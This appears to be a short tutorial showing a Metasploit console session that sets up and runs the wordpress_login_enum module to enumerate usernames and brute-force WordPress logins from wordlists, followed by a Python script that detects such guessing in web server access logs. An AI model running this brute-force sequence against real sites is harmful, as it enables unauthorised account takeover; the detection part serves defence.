control – metasploit wordpress_login_enum

msf > use auxiliary/scanner/http/wordpress_login_enum

msf auxiliary(wordpress_login_enum) > set URI /wordpress/wp-login.php
URI => /wordpress/wp-login.php
msf auxiliary(wordpress_login_enum) > set PASS_FILE /tmp/passes.txt
PASS_FILE => /tmp/passes.txt
msf auxiliary(wordpress_login_enum) > set USER_FILE /tmp/users.txt
USER_FILE => /tmp/users.txt
msf auxiliary(wordpress_login_enum) > set RHOSTS (IP Address)
RHOSTS => (IP Address)
msf auxiliary(wordpress_login_enum) > run

msf auxiliary(wordpress_login_enum) > show options

Module options (auxiliary/scanner/http/wordpress_login_enum):

Name              Current Setting  Required  Description
----              ---------------  --------  -----------
BLANK_PASSWORDS   true             yes       Try blank passwords for all users
BRUTEFORCE        true             yes       Perform brute force authentication
BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
PASSWORD                           no        A specific password to authenticate with
PASS_FILE                          no        File containing passwords, one per line
Proxies                            no        Use a proxy chain
RHOSTS                             yes       The target address range or CIDR identifier
RPORT             80               yes       The target port
STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
THREADS           1                yes       The number of concurrent threads
URI               /wp-login.php    no        Define the path to the wp-login.php file
USERNAME                           no        A specific username to authenticate as
USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
USER_FILE                          no        File containing usernames, one per line
VALIDATE_USERS    true             yes       Enumerate usernames
VERBOSE           true             yes       Whether to print output for all attempts
VHOST                              no        HTTP server virtual host
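
From the defender's side, a run like the one above appears in the web server's access log as a burst of POSTs to wp-login.php from one client. The following is an added example, not part of the original post: it assumes combined-format access logs and default WordPress behaviour (HTTP 200 on a failed login, 302 on a successful one), and the log lines and function name are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (documentation IP ranges, not real data).
_FMT = '{ip} - - [10/Oct/2023:13:55:{s:02d} +0000] "{req} HTTP/1.1" {st} 3120'
_LOGIN = "POST /wordpress/wp-login.php"
SAMPLE_LOG = "\n".join(
    # one client guessing: six failed logins in a row
    [_FMT.format(ip="203.0.113.7", s=i, req=_LOGIN, st=200) for i in range(6)]
    + [
        # ordinary user: one typo, then a successful login
        _FMT.format(ip="198.51.100.20", s=10, req=_LOGIN, st=200),
        _FMT.format(ip="198.51.100.20", s=12, req=_LOGIN, st=302),
        # the guessing client again: a page view, a hit, then more guesses
        _FMT.format(ip="203.0.113.7", s=13, req="GET /wordpress/", st=200),
        _FMT.format(ip="203.0.113.7", s=14, req=_LOGIN, st=302),
        _FMT.format(ip="203.0.113.7", s=15, req=_LOGIN, st=200),
    ]
)

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})\b'
)

def detect_login_guessing(log_text, min_failures=5):
    """Return {ip: {"failures": n, "success_after_failures": bool}}
    for clients with at least min_failures failed wp-login.php POSTs."""
    stats = defaultdict(lambda: {"failures": 0, "success_after_failures": False})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Match any install path (e.g. /wordpress/wp-login.php), ignoring the query.
        if not m["path"].split("?", 1)[0].endswith("/wp-login.php"):
            continue
        s = stats[m["ip"]]
        if m["status"] == "200":
            # Assumption: default WordPress re-renders the form (200) on failure.
            s["failures"] += 1
        elif m["status"] == "302" and s["failures"] >= min_failures:
            # A redirect after many failures suggests a guessed credential.
            s["success_after_failures"] = True
    return {ip: dict(s) for ip, s in stats.items() if s["failures"] >= min_failures}

if __name__ == "__main__":
    for ip, info in detect_login_guessing(SAMPLE_LOG).items():
        print(ip, info)
```

A client flagged with `success_after_failures` set is the case to triage first, since the account it logged in to should be treated as compromised and its password reset.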
